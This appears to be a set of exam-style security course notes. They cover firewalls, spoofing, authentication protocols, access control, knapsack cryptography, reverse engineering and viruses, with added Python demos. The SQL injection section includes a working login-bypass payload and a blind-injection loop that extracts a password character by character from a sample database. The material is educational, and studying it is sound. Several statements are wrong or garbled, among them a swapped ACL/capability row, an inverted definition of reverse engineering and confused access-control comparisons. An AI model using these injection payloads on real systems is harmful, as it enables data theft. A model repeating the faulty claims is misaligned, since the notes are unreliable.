Difference between firewall and IDS. 5M
No. | Firewall | Intrusion Detection System
1 | A firewall is hardware and/or software that functions in a networked environment to block unauthorized access while permitting authorized communications. | An Intrusion Detection System (IDS) is a software or hardware device installed on the network (NIDS) or on a host (HIDS) to detect and report intrusion attempts against the network.
2 | A firewall can block a connection. | An Intrusion Detection System (IDS) cannot block a connection.
3 | A firewall performs actual actions such as blocking and filtering. | An intrusion detection system only detects connections and alerts a system administrator.
4 | A firewall restricts access to your network by deciding which packets should be allowed. | An intrusion detection system is like a security camera: it only detects packets.
5 | Types of firewall: packet filtering firewall, stateful inspection firewall, network address translation (NAT) firewall, application-based firewall, hybrid firewall. | Types of IDS: network IDS (NIDS), host IDS (HIDS), protocol-based IDS, application protocol-based IDS, anomaly-based IDS, misuse-based IDS, hybrid IDS.
What is IP spoofing? How does it lead to denial of service attack? 5M
IP spoofing:
1. When a computer outside your network pretends to be a trusted computer inside the network, this action by the attacker is called IP spoofing.
2. To gain access to your network, an outside computer must obtain one of the IP addresses trusted by the network, so the attacker may use an IP address within the range of your network.
3. Alternatively, the attacker can use an authorized external IP address that is trusted within the network.
4. These IP addresses may be trusted to the extent that they also have special privileges on the important resources of the network.
5. IP spoofing and denial of service are the two most well-known attacks that an intruder launches against a particular target.
6. While IP spoofing targets the routing table of the network, a DoS attack aims at exhausting the resources of the target computer.
7. Different ways of IP spoofing:
a. Injection of data or a set of commands into an existing stream of data passed between a client and a server application.
b. Injection of data or commands into a peer-to-peer network connection.
8. The attacker also needs to change the routing table of the network. Changing the routing table enables the attacker to have bidirectional communication; for this purpose, the attacker points the entire routing table at the spoofed IP address.
9. Once the routing table is changed, the attacker starts receiving all the data sent from the network to the spoofed IP address.
10. He/she can even reply to those packets just like any other trusted user.
Denial of service attack:
1. A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting the services of a host connected to the Internet.
2. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload the system and prevent some or all legitimate requests from being fulfilled.
3. A DoS attack is analogous to a group of people crowding the entry door or gate of a shop or business and not letting legitimate parties enter, disrupting normal operations.
For an online shopping system identify vulnerability, threat and attack. 5M
Vulnerability:
1. Vulnerability is a weakness that is inherent in every network and device.
2. This includes routers, switches, desktops, servers, and even security devices themselves.
3. Vulnerability is unintentional, which could exist in system design, business operations,
installed software, and network configurations.
4. Vulnerabilities can be hardware, software or network vulnerabilities.
5. Vulnerability is an internal problem.
6. Types of vulnerability:
i. Software vulnerabilities: Software vulnerabilities arise when applications have errors or bugs in them. Attackers look at buggy software as an opportunity to attack the system by making use of these flaws. Example: buffer overflow, race conditions etc.
ii. Firewall vulnerabilities: Firewalls are software and hardware systems that protect an internal network from attacks. A firewall vulnerability is an error, weakness or invalid assumption made during the firewall design, implementation or configuration that can be exploited to attack the trusted network that the firewall is supposed to protect.
iii. TCP/IP vulnerabilities: These are vulnerabilities of the various layers of a network. The protocols may lack features that are desirable on an insecure network. Example: ARP attacks, fragmentation attacks etc.
iv. Wireless Network Vulnerabilities: Wireless LANs have similar protocol-based attacks that
plague wired LAN. Unsecured wireless access points can be a danger to organizations as they
offer the attacker a route around the company’s network. Example: SSID issues, WEP issues etc.
v. Operating system vulnerabilities: The security of the applications running on an operating system depends on the security of the operating system. The slightest negligence by the system administrator can make the operating system vulnerable.
vi. Web Server Vulnerabilities: These vulnerabilities are caused due to design and engineering
errors or faulty implementation. Example: sniffing, spoofing etc.
Threat:
1. In computer security, a threat is a potential cause of an incident that may result in harm to systems and the organization.
2. A threat can be either "intentional" (e.g. hacking by an individual cracker or a criminal organization) or "accidental" (e.g. the possibility of a computer malfunctioning), or otherwise a circumstance, capability, action or event.
3. Threats classification: Threats can be classified according to their type and origin:
4. Types of threats:
i. Interception: When an attacker gains unauthorized access to confidential information, it is
known as interception. Example: Snooping, Traffic analysis
ii. Interruption: When important information of the system is lost or unavailable to a user for some reason, it is known as interruption. Example: Denial of Service (DoS)
iii. Modification: If an attacker gets access to a user’s information and can also tamper it then
such a threat is known as a modification.
iv. Fabrication: An attacker can create or fabricate counterfeit objects on a computing system. The attacker may insert extra transactions into a network communication system or add records to an existing database. Example: man-in-the-middle attack, replay attack etc.
5. Origins of threats:
i. Deliberate: aiming at information asset- spying, illegal processing of data
ii. Accidental: equipment failure, software failure
iii. Environmental: natural event, loss of power supply
iv. Negligence: Known but neglected factors, compromising the network safety and
sustainability
Attack:
1. In computers and computer networks, an attack is any attempt to destroy, expose, alter, disable, steal or gain unauthorized access to or make unauthorized use of an asset.
2. Types of attack: Active attack and Passive attack
3. An "active attack" attempts to alter system resources or affect their operation.
4. A "passive attack" attempts to learn or make use of information from the system but does not affect system resources.
5. An "inside attack" is an attack initiated by an entity inside the security perimeter (an
"insider").
6. An "outside attack" is initiated from outside the perimeter, by an unauthorized or illegitimate
user of the system (an "outsider").
Explain Needham Schroeder Authentication Protocol. 10M
1. The term Needham–Schroeder protocol can refer to one of the two key transport protocols
intended for use over an insecure network, both proposed by Roger Needham and Michael
Schroeder.
2. The Needham–Schroeder Symmetric Key Protocol is based on a symmetric encryption
algorithm.
3. It forms the basis for the Kerberos protocol.
4. This protocol aims to establish a session key between two parties on a network, typically to
protect further communication.
5. The Needham–Schroeder Public-Key Protocol is based on public-key cryptography.
6. This protocol is intended to provide mutual authentication between two parties communicating on a network, but in its proposed form it is insecure.
7. The symmetric Protocol
Here, Alice (A) initiates the communication to Bob (B). S is a server trusted by both parties. In
the communication:
i. A and B are identities of Alice and Bob respectively
ii. KAS is a symmetric key known only to A and S
iii. KBS is a symmetric key known only to B and S
iv. NA and NB are nonces generated by A and B respectively
v. KAB is a symmetric, generated key, which will be the session key of the session between A
and B
The protocol can be specified as follows in security protocol notation:
A → S : A , B , NA
Alice sends a message to the server identifying herself and Bob, telling the server she wants to
communicate with Bob.
S → A : {NA, KAB, B, {KAB, A}KBS}KAS
The server generates KAB and sends back to Alice a copy encrypted under KBS for Alice to forward to Bob, and also a copy for Alice. Since Alice may be requesting keys for several different people, the nonce assures Alice that the message is fresh and that the server is replying to that particular message, and the inclusion of Bob's name tells Alice who she is to share this key with.
A → B : {KAB, A}KBS
Alice forwards the key to Bob, who can decrypt it with the key he shares with the server, thus authenticating the data.
B → A : {NB}KAB
Bob sends Alice a nonce encrypted under KAB to show that he has the key.
A → B : {NB−1}KAB
Alice performs a simple operation on the nonce, re-encrypts it and sends it back, verifying that she is still alive and that she holds the key.
8. Attacks on the protocol
The protocol is vulnerable to a replay attack (as identified by Denning and Sacco). If an attacker uses an older, compromised value for KAB, he can then replay the message {KAB, A}KBS to Bob, who will accept it, being unable to tell that the key is not fresh.
9. Fixing the attack
This flaw is fixed in the Kerberos protocol by the inclusion of a timestamp. It can also be fixed
with the use of nonces as described below. At the beginning of the protocol:
A → B : A
Alice sends to Bob a request.
B → A : {A, N′B}KBS
Bob responds with a nonce encrypted under his key with the server.
A → S : A, B, NA, {A, N′B}KBS
Alice sends a message to the server identifying herself and Bob, telling the server she wants to communicate with Bob.
S → A : {NA, KAB, B, {KAB, A, N′B}KBS}KAS
Note the inclusion of the nonce.
The protocol then continues through the final three steps as described in the original protocol above. Note that N′B is a different nonce from NB. The inclusion of this new nonce prevents the replaying of a compromised version of {KAB, A}KBS, since such a message would need to be of the form {KAB, A, N′B}KBS, which the attacker can't forge since she does not have KBS.
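The symmetric protocol, the Denning–Sacco replay and the N′B fix, as an added example that is not part of the original notes: a Python simulation in which Bob accepts a replayed old {KAB, A}KBS ticket under the original protocol and rejects it once the ticket must carry his current N′B. The keyed SHA-256 stream cipher with an HMAC tag is an assumed stand-in for a real authenticated cipher; the identities "A", "B" and the message field names are constructed.

```python
"""Toy Needham-Schroeder symmetric-key run, Denning-Sacco replay, and the N'B fix.
The cipher below is a stand-in (keyed SHA-256 stream + HMAC), not a real AEAD."""
import hashlib, hmac, json, os

def _keystream(key, iv, n):
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + iv + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def enc(key, obj):
    """{obj}key: encrypt-then-MAC, so a wrong key or tampering is detected on dec()."""
    pt, iv = json.dumps(obj).encode(), os.urandom(12)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, iv, len(pt))))
    return iv + ct + hmac.new(key, iv + ct, "sha256").digest()

def dec(key, blob):
    iv, ct, tag = blob[:12], blob[12:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, iv + ct, "sha256").digest()):
        raise ValueError("bad MAC: wrong key or tampered message")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, iv, len(ct)))))

def nonce():
    return int.from_bytes(os.urandom(8), "big")

class Server:
    """S holds the long-term keys KAS and KBS and generates the session key KAB."""
    def __init__(self, keys):
        self.keys = keys
    def handle(self, a, b, na, bob_part=None):
        kab = os.urandom(32).hex()
        inner = {"KAB": kab, "A": a}
        if bob_part is not None:                 # fixed protocol: bind N'B into the ticket
            req = dec(self.keys[b], bob_part)    # {A, N'B}KBS forwarded by Alice
            if req["A"] != a:
                raise ValueError("Bob's request names a different initiator")
            inner["NB'"] = req["NB'"]
        ticket = enc(self.keys[b], inner)        # {KAB, A[, N'B]}KBS
        return enc(self.keys[a], {"NA": na, "KAB": kab, "B": b, "ticket": ticket.hex()})

class Bob:
    def __init__(self, kbs):
        self.kbs, self.expect, self.kab, self.nb = kbs, None, None, None
    def challenge(self, a):                      # B -> A : {A, N'B}KBS (fixed protocol only)
        self.expect = nonce()
        return enc(self.kbs, {"A": a, "NB'": self.expect})
    def accept(self, ticket, fixed):             # A -> B : {KAB, A[, N'B]}KBS
        t = dec(self.kbs, ticket)
        if fixed and t.get("NB'") != self.expect:
            raise ValueError("ticket does not carry my current N'B: stale or forged")
        self.expect, self.kab, self.nb = None, bytes.fromhex(t["KAB"]), nonce()
        return enc(self.kab, {"NB": self.nb})    # B -> A : {NB}KAB
    def check(self, reply):                      # A -> B : {NB-1}KAB
        return dec(self.kab, reply)["NB-1"] == self.nb - 1

def run(server, kas, bob, fixed):
    """Alice's side of one session; returns (KAB, ticket) so the ticket can be replayed."""
    na = nonce()
    bob_part = bob.challenge("A") if fixed else None
    m2 = dec(kas, server.handle("A", "B", na, bob_part))       # S -> A
    if m2["NA"] != na or m2["B"] != "B":
        raise ValueError("server reply is not fresh or not for Bob")
    kab, ticket = bytes.fromhex(m2["KAB"]), bytes.fromhex(m2["ticket"])
    m4 = dec(kab, bob.accept(ticket, fixed))                   # B -> A
    if not bob.check(enc(kab, {"NB-1": m4["NB"] - 1})):        # A -> B
        raise ValueError("Bob rejected NB-1")
    return kab, ticket

def replay(bob, old_kab, old_ticket, fixed):
    """An attacker who learned an old KAB replays its ticket; True if Bob accepts it."""
    try:
        if fixed:
            bob.challenge("A")                   # the attempt makes Bob issue a fresh N'B
        m4 = dec(old_kab, bob.accept(old_ticket, fixed))
        return bob.check(enc(old_kab, {"NB-1": m4["NB"] - 1}))
    except ValueError:
        return False

def demo():
    """Returns {False: True, True: False}: the replay works only against the original."""
    kas, kbs = os.urandom(32), os.urandom(32)
    server, bob = Server({"A": kas, "B": kbs}), Bob(kbs)
    return {fixed: replay(bob, *run(server, kas, bob, fixed), fixed)
            for fixed in (False, True)}
```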
10. The Public-Key protocol
This assumes the use of a public-key encryption algorithm.
Here, Alice (A) and Bob (B) use a trusted server (S) to distribute public keys on request. These
keys are:
i. KPA and KSA, respectively the public and private halves of an encryption key pair belonging to A (S stands for "secret key" here)
ii. KPB and KSB, similar, belonging to B
iii. KPS and KSS, similar, belonging to S (note that this has the property that KSS is used to encrypt and KPS to decrypt).
Difference between access control list and capability list. 5M
No. | Access control list | Capability list
1 | An access control list is a table that tells a computer operating system which access rights each user has to a particular system object, such as a file directory or an individual file. | A capability list is a token, ticket or key that gives the possessor permission to access an entity or object in a computer system.
2 | An access control list can attempt to name any object in the system as the target of an operation. | In a capability list a user can only name those objects for which a capability is held.
3 | An access control list is based on users. | A capability list is based on processes.
4 | An access control list consists of tokens, tickets and keys that give permission to access. | A capability list consists of addresses or names of the devices to which permission should be given.
5 | An access control list allows deleting a user from the list. | A capability list does not allow deleting a user.
Consider an online voting system. People will cast their votes through the internet. For this system identify vulnerability, threat and attack. 5M
Vulnerability: Common vulnerabilities in online voting systems are:
1. Denial-of-service attack against the voting process. If a client sends an HTTP request
containing unexpected header fields, the server logs the field names to disk. By sending many
specially crafted requests containing fields with very long names, an attacker can exhaust the
server’s log storage, after which it will fail to accept any new votes. Curiously, the vulnerable
code is only a few lines from the comment, “Don’t write to disk; we don’t know how large the
value is.” This indicates that the developers were aware of similar attacks but failed to account
for all variants.
2. A second problem we discovered is a shell-injection vulnerability in a server-side user
interface that is intended to allow operators to perform pre-determined administrative tasks.
The vulnerability would allow such an operator to execute arbitrary shell commands on the
election servers with root privileges. Under current procedures, this is moot, since the same
workers perform other administrative tasks at the command line as root.
3. Reliability of the software or hardware devices. There are still problems in the software and devices: when used several times there are sometimes errors in the calculation of the number of votes, and on the hardware side the equipment is sometimes not able to respond quickly.
4. Human factors, such as election officials who sometimes do not understand how to operate the device technology used in the election. A further factor is that the voters themselves have not been trained: voters may not know their own constituencies or may never have made a selection using e-voting technology, so things go wrong during the run, resulting in many failures in selecting the intended candidate.
Threats: Internet voting systems pose numerous security threats.
1. Denial of service: Denial of service is a common threat. It occurs during an internet election.
2. Trojan horse spyware to change or monitor votes: With this threat there is the possibility of vote theft and loss of privacy.
3. Automated vote buying:
4. Insider attack on the voting system: Insider attacks are common in commercial settings.
5. Virus specific to the Internet voting system: Vote theft, privacy loss, disenfranchisement and compromise of the election are possible.
6. Spoofing: Spoofing is an easy and common threat. It can be launched from anywhere.
Attacks:
1. Denial of Service (DoS) attacks that are carried out have devastating consequences and in most cases severely affect the ability to provide availability of a system. The following two methods describe how a hacker may compromise the availability of a voting system.
A. Ping of death: The ping of death relies on a flaw in some Transmission Control Protocol / Internet Protocol (TCP/IP) stack implementations. The attack relates to the handling of unusually and illegally large ping packets. Remote systems receiving such packets can crash as the memory allocated for storing packets overflows. The attack does not affect all systems in the same way: some systems will crash, and others will remain unaffected.
B. Packet flooding: Packet flooding exploits the fact that establishing a connection with the TCP protocol involves a three-phase handshake between the systems. In a packet flooding attack, an attacking host sends many packets and does not respond with an acknowledgment to the receiving host. As the receiving host waits for more and more acknowledgments, the buffer queue fills up. Ultimately, the receiving machine can no longer accept legitimate connections.
2. A computer virus is a computer program that can reproduce itself and may cause undesired effects in computers where it is active. To do its malicious work, the virus needs to be executed. Usually viruses are located together with other code that is likely to be executed by a user. As long as the virus is active on the computer, it can copy itself to other files or disks when they are used. Viruses could be made to destroy e-voting systems. This could compromise availability at election time, forcing governments and institutions to perform re-elections.
3. A worm is a type of virus that does not change any existing program or file to spread itself. Instead, it makes copies of itself within an infected computer and spreads to become active on other systems. It is intentionally destructive, overwriting portions of files with random data. This damage is not repairable, so files may need reinstallation or restoring from a backup. Worms could overwrite files and change the results of votes if programmed to do so, bringing the integrity of the votes into question.
4. Trojan horses are pieces of computer code that are downloaded to a computer while it is connected to the internet. They may be harmless, but they could possibly delete or modify an important file on the computer, plant a harmful virus, or even steal users' passwords. This makes all sorts of fraudulent schemes possible. Once inside a computer, the Trojan horse can access passwords, screen names and other personal information and then distribute this confidential data to the attacker. A Trojan horse represents an immense threat to the confidentiality and integrity of the information of e-voting systems.
5. Numerous physical attacks can be carried out on an e-voting system to sabotage an election. Vandalism of e-voting systems would make them inoperable on the day of the election. Saboteurs could remove network connections and pull the plugs out of e-voting systems, causing votes to be lost. Attackers may remove hard drives or smart cards, replacing them with falsified data. E-voting machines could be stolen, with attackers discovering sensitive voting information about users.
Distinguish between attack and vulnerability. 5M
No. | Attack | Vulnerability
1 | An attack is an act or event that harms a computer system. | A vulnerability is some flaw or weakness in a computer system.
2 | An attack is an intentional way to destroy a system. | A vulnerability is unintentional and could exist in system design, business operations, installed software and network configurations.
3 | An attack can be an active attack or a passive attack. | Vulnerabilities can be hardware, software or network vulnerabilities.
4 | An attack is launched from outside or inside the network. | A vulnerability is an internal problem.
5 | Examples: cross-site scripting, SQL injection, viruses etc. | Examples: buffer overflow, race conditions etc.
Difference between symmetric and asymmetric cryptography. 5M
No. | Symmetric cryptography | Asymmetric cryptography
1 | Symmetric encryption requires a single key known only to the authorized parties. | Asymmetric encryption uses a pair of keys, a public key and a private key.
2 | Symmetric encryption uses the same key for both encryption and decryption. | Asymmetric encryption uses one key for encryption and another key for decryption.
3 | The most commonly used symmetric encryption algorithms include DES, 3DES, AES and RC4. | The most common asymmetric encryption algorithm is RSA.
4 | Symmetric key algorithms are faster compared to asymmetric key algorithms. | Asymmetric key algorithms are slower compared to symmetric key algorithms.
5 | Symmetric encryption is used for bulk data transmission. | Asymmetric encryption is used for securely exchanging secret keys.
Knapsack cryptosystem. 5M
1. Knapsack is an asymmetric-key cryptosystem.
2. It requires two keys for communication: a public key and a private key.
3. The public key is used for encryption and the private key is used for decryption.
4. The knapsack problem is also called the rucksack problem.
5. Knapsack is a problem in combinatorial optimization.
6. The knapsack problem states that, given a set of items, each with a mass and a value, determine the number of each item to include in a collection so that the total weight is less than or equal to a given limit and the total value is as large as possible.
7. There are two versions of knapsack:
A. 0/1 knapsack problem:
Items are indivisible in this knapsack problem: you can either take an item or not. Some special instances of this problem can be solved with dynamic programming.
B. Fractional knapsack problem:
Items are divisible in this knapsack problem: you can take any fraction of an item.
8. Algorithm for knapsack (computes the knapsack sum T of the elements Si selected by the bits Xi):
KnapsackSum(S[1..n], X[1..n])
{
    T ← 0
    For (i = 1 to n)
    {
        T ← T + Si × Xi
    }
    Return T
}
9. Inverse algorithm for knapsack (recovers the bits Xi from T when S is superincreasing, scanning from the largest element down and subtracting each element that still fits):
Inverse_KnapsackSum(T, S[1..n])
{
    For (i = n down to 1)
    {
        If (T ≥ Si)
        {
            Xi ← 1
            T ← T − Si
        }
        Else
            Xi ← 0
    }
    Return X[1..n]
}
10. The knapsack cryptosystem includes the following processes:
A. Key generation
B. Encryption process
C. Decryption process
11. Key generation: generation of the encryption and decryption keys, i.e. the public key and the private key.
12. Encryption process: encryption of the message using the knapsack algorithm. It converts plaintext into ciphertext.
13. Decryption process: decryption of the message using the inverse knapsack algorithm. It converts ciphertext into plaintext.
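The key generation, encryption and decryption processes listed above, as an added example that is not part of the original notes, carried through as the Merkle–Hellman knapsack construction (the classic instance of this cryptosystem, which the notes do not name). Assumed: a superincreasing private sequence s, a modulus q greater than the sum of s, and a multiplier r coprime to q; the public key is s[i]·r mod q, and the sample key (2, 3, 6, 13, 27, 52), q = 105, r = 31 is a constructed instance.

```python
"""Merkle-Hellman knapsack: KnapsackSum / Inverse_KnapsackSum used as the
encryption and decryption primitives around a superincreasing private key."""
import math
import random

def knapsack_sum(s, x):
    """KnapsackSum: T = sum of s[i] * x[i] for bits x[i] in {0, 1}."""
    return sum(si * xi for si, xi in zip(s, x))

def inverse_knapsack_sum(t, s):
    """Inverse_KnapsackSum: easy only because s is superincreasing (each element
    exceeds the sum of all earlier ones); scan from the largest element down."""
    x = [0] * len(s)
    for i in range(len(s) - 1, -1, -1):
        if t >= s[i]:
            x[i] = 1
            t -= s[i]
    if t != 0:
        raise ValueError("T is not a sum of elements of s")
    return x

def keygen(n, rng=random):
    """Private key (s, q, r); public key is the 'hard' knapsack s[i] * r mod q."""
    s, total = [], 0
    for _ in range(n):
        si = rng.randrange(total + 1, 2 * total + 2)   # strictly greater than the sum so far
        s.append(si)
        total += si
    q = rng.randrange(total + 1, 2 * total + 1)        # q > sum(s) so decryption is exact
    r = rng.randrange(2, q)
    while math.gcd(r, q) != 1:                         # r must be invertible mod q
        r = rng.randrange(2, q)
    return [(si * r) % q for si in s], (s, q, r)

def encrypt(public, bits):
    """Ciphertext is the knapsack sum of the public sequence over the message bits."""
    return knapsack_sum(public, bits)

def decrypt(private, c):
    """Multiply by r^-1 mod q to get back the easy knapsack sum, then solve it."""
    s, q, r = private
    return inverse_knapsack_sum((c * pow(r, -1, q)) % q, s)

def bits_of(byte):
    return [(byte >> (7 - i)) & 1 for i in range(8)]

def byte_of(bits):
    return sum(b << (7 - i) for i, b in enumerate(bits))

def roundtrip(seed, msg):
    """Encrypt and decrypt msg byte by byte with a key pair from a seeded RNG."""
    public, private = keygen(8, random.Random(seed))
    return bytes(byte_of(decrypt(private, encrypt(public, bits_of(b)))) for b in msg)
```

Only the holder of (s, q, r) can turn the public "hard" knapsack back into the easy superincreasing instance. Merkle–Hellman was broken in the early 1980s (Shamir), so it is studied as a historical public-key scheme rather than used in practice.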
What are the different modes of authenticating a user?
Different modes of authenticating user:
1. Computer recognition software:
i. This authentication factor is accomplished by installing a small authentication software plug-in that places a cryptographic device marker on the consumer's computer.
ii. It can then be verified as a second factor during the authentication process.
iii. The authentication process would then include two factors: password and the device marker
on the consumer’s computer.
iv. Because the device marker is always on the consumer's computer, the user only has to enter
their username and password to log in.
2. Biometrics:
i. Biometric authentication is the verification of physical characteristics, such as a fingerprint or the eye, using a hardware device.
ii. Offering biometric authentication for consumer online banking has significant challenges
including distribution of biometric readers and the associated cost per user.
iii. Fingerprint scan is an example of biometric authentication.
iv. Face recognition is also a biometric authentication technique.
3. E-mail or SMS one-time password (OTP):
i. E-mail or SMS OTP is based on sending a second, one-time-use password to a registered e-mail address or cell phone.
ii. The user must then input that second one-time password in addition to their normal password to authenticate to the online bank.
iii. This method is generally used for everyday logins.
iv. There is a time lag before users get the OTP they need to log in, but this method is often used for the initial enrollment before another form of authentication is provided.
4. One Time Password (OTP) token:
i. An OTP token provides users with a hardware device that generates a constantly changing second password, which must be entered into the online banking web site in addition to the normal password.
ii. OTP tokens require the user to carry the token with them to log in to the bank web site.
iii. If a customer has multiple banks that require OTP tokens, then the user must carry multiple tokens unless the banks integrate their systems to accept a single token.
iv. OTP tokens are mostly used in bank transactions.
5. Out of band:
i. Out-of-band verification involves the bank calling a registered phone number and requesting that the user enter their password over the phone before allowing the user to log in.
ii. This is similar to e-mail or SMS OTPs.
iii. This requirement introduces a time lag and requires that the user be at the location of the
registered phone number.
6. Peripheral device recognition:
i. Peripheral device recognition is accomplished by placing a cryptographic device marker on a user's existing device, such as a USB flash drive, smartphone memory card, etc.
ii. This can be a good alternative to the OTP token.
iii. It provides a hardware-based second factor but does not require the user to carry an additional device.
iv. In addition, device markers from multiple banks can reside on a single hardware device without requiring the various banks to integrate their systems.
7. Scratch-off card:
i. A scratch-off card contains several PINs that the user scratches off; each is used only once to log in.
ii. This is a lower-cost one-time password option than tokens.
Difference between discretionary access control and mandatory access control: 5M
No. | Discretionary access control | Mandatory access control
1 | In discretionary access control (DAC), the owner of the object specifies which subjects can access the object. | In mandatory access control (MAC), the system specifies which subjects can access specific data objects.
2 | Discretionary access control is based on the discretion of the owner. | Mandatory access control is based on security labels.
3 | Operating systems such as Windows, Linux and Macintosh are based on discretionary access control. | Mandatory access control is used in military institutions.
4 | Compared with mandatory access control, discretionary access control is not an easier way of establishing and maintaining access. | Compared with discretionary access control, mandatory access control is an easier way of establishing and maintaining access.
5 | Discretionary access control is more flexible than mandatory access control. | Mandatory access control is less flexible than discretionary access control.
6 | Discretionary access control is more labor intensive than mandatory access control. | Mandatory access control is less labor intensive than discretionary access control.
7 | Access can be provided by users. | In mandatory access control, access can only be changed and provided by an admin.
Software Reverse engineering 5M
1. Software Reverse Engineering (SRE) is the practice of analyzing a software system or a part of
the software system.
2. Reverse engineering skills are also used to detect and neutralize viruses, malware and to
protect intellectual property.
3. The process of taking a software program's binary code and recreating it so as to trace it back to the original source code is called software reverse engineering.
4. Software reverse engineering involves reversing a program's machine code back into the
source code that it was written in, using program language statements.
5. Software reverse engineering is widely used in computer hardware and software to enhance
product features and to fix certain bugs.
6. Reverse engineering is also known as the process of converting code written in a high-level language into a low-level language without changing the original program.
7. It is similar to disassembling the parts of a vehicle to understand the basic functioning of the
machine and internal parts and making appropriate adjustments for a better performance.
8. Reverse engineering is taking apart an object to see how it works in order to duplicate or
enhance the object.
9. Reverse engineering can be applied to several parts of the software or hardware
development activities to convey different meanings.
10. There are two types of reverse engineering. In the first, the source code is available but the high-level aspects of the program are not; the effort to recover them for the software being developed is known as reverse engineering.
11. In the second case, the source code of the software is not available, and the process of discovering the possible source code is known as reverse engineering.
12. To avoid copyright, reverse engineering uses clean room design technique.
13. The main purpose of reverse engineering:
i. Audit the security
ii. Remove the copy protection
iii. Customize the embedded systems
iv. Include additional features
14. Reverse engineering is used in many fields such as software design, software testing and
software programming etc.
15. In software design, reverse engineering enables the developer or programmer to add new features to existing software with or without knowing the source code. Different techniques are used to add new features to the software.
16. Reverse engineering helps the testers to study and analyze the virus code and other
malware code.
17. The main purpose of reverse engineering is to make the system robust so as to protect it from spyware and hackers.
18. The process of reverse engineering uses some tools to analyze software and determine its
component.
19. Tools used in software reverse engineering:
i. Disassemblers: A disassembler is used to convert binary code into assembly code and to extract strings, functions, libraries etc. The disassembler converts the machine language into a user-friendly format.
ii. Debuggers: This tool expands the functionality of a disassembler by supporting the CPU registers, hex dumping of the program, a view of the stack etc. Using debuggers, programmers can set breakpoints and edit the assembly code at run time. Debuggers analyze the binary in a similar way to the disassembler and allow the reverser to step through the code by running one line at a time to investigate the results.
iii. Hex editors: These editors allow the binary to be viewed in the editor and changed as per the requirements of the software. There are different types of hex editors available that are used for different functions.
iv. PE and resource viewer: The binary code is designed to run on a Windows-based machine and has very specific data which tells how to set up and initialize a program. All the programs that run on Windows should have a portable executable that supports the DLLs the program needs to borrow from.
20. Reverse engineering has developed into a positive approach for creating a descriptive data set of the original object.
21. There are many applications used for reverse engineering.
22. Due to the development of multiple devices, reverse engineering software enables programmers to manipulate the data into a useful form.
23. Reverse engineering is also beneficial for businesses and owners wishing to incorporate advanced features into their software to meet the demands of growing markets.
What are the different phases of a virus? Explain 5M
Different phases of virus:
i. Dormant phase
ii. Propagation phase
iii. Triggering phase
iv. Execution phase
i. Dormant Phase:
1. The virus remains idle.
2. It gets activated based on a certain action or event.
3. Examples of such events are a user pressing a key, or a certain date and time, etc.
ii. Propagation Phase:
1. The virus starts propagating, that is, multiplying itself.
2. A piece of code copies itself and each copy starts making more copies of itself, thus propagating.
3. The virus starts placing its copies into other applications.
iii. Triggering Phase:
1. A dormant virus moves into this phase when it gets activated, that is, when the event it was waiting for occurs.
2. The virus is activated to perform the function for which it was intended.
3. It can be caused by a variety of system events.
iv. Execution Phase:
1. This is the actual work of the virus.
2. In this phase the virus's function is performed.
3. The virus can be destructive or harmless.
Define with examples i) SQL injections ii) Cross-site scripting. 5M
i. SQL injection:
1. SQL injection is a malicious technique used to attack databases.
2. SQL injection is a code injection technique that exploits security flaws in database application programs.
3. Such SQL vulnerabilities occur when user input is not strictly checked.
4. SQL injection is one of the most common application-layer attack techniques used for extracting valuable data from databases.
5. SQL injection attacks:
i. Incorrectly filtered escape characters
ii. Incorrect type handling
iii. Vulnerabilities in database server
iv. Blind SQL injection
v. Conditional responses
vi. Conditional errors
vii. Time delays
6. Incorrectly filtered escape characters:
It occurs when user input is not properly filtered.
7. Incorrect type handling:
It occurs when a data field is not strongly typed checked for constraint.
8. Vulnerabilities in database server:
It occurs due to problem in server software.
9. Blind SQL injection:
This attack is used when a web application is vulnerable to an SQL injection but not visiblr to
the attacker.
10 Conditional responses:
This SQL injection evaluates a logical statement on an ordinary application screen.
11. Conditional errors:
This type of blind SQL injection attack causes some error.
12. Time delays:
Time delay is type of blind SQL injection. It causes to query to take infinite time to execute a
query.
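As an added example (not part of the original answer), the following Python code uses an in-memory SQLite database constructed for the demonstration to show a login query that is vulnerable to incorrectly filtered escape characters, its parameterised fix, and a boolean-based blind injection that reads a password one character at a time through conditional responses. The table, account names and passwords are invented.

```python
import sqlite3


def make_db():
    """Constructed sample database for the example: two accounts, not real data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users (username, password, is_admin) VALUES (?, ?, ?)",
                     [("alice", "s3cret", 1), ("bob", "hunter2", 0)])
    return conn


def login_vulnerable(conn, username, password):
    # Untrusted input is pasted into the statement text. An unfiltered single
    # quote closes the intended string literal and the rest of the input is
    # interpreted as SQL (incorrectly filtered escape characters).
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    # Parameterised query: the values travel separately from the statement and
    # can never change its structure, whatever characters they contain.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def blind_extract_password(conn, victim, oracle=login_vulnerable, max_len=40):
    # Boolean-based blind injection. The attacker never sees query output, only
    # whether the login succeeded (a conditional response). Each probe asks one
    # yes/no question about one character of the victim's password, e.g.
    #   ' OR username='alice' AND unicode(substr(password,3,1))=99--
    # AND binds tighter than OR, so a row comes back only when the character
    # test is true. Past the end of the password substr() is empty, no probe
    # succeeds, and the loop stops.
    recovered = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            probe = ("' OR username='%s' AND unicode(substr(password,%d,1))=%d-- "
                     % (victim, pos, code))
            if oracle(conn, probe, "x") is not None:
                recovered += chr(code)
                break
        else:
            break   # no character matched at this position: end of password
    return recovered
```

Against `login_vulnerable` the classic `' OR 1=1-- ` input logs in as the first user in the table and the blind loop recovers the whole password without ever seeing a query result; against `login_safe` both fail, because the driver binds the probe as a literal string.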
ii. Cross site scripting:
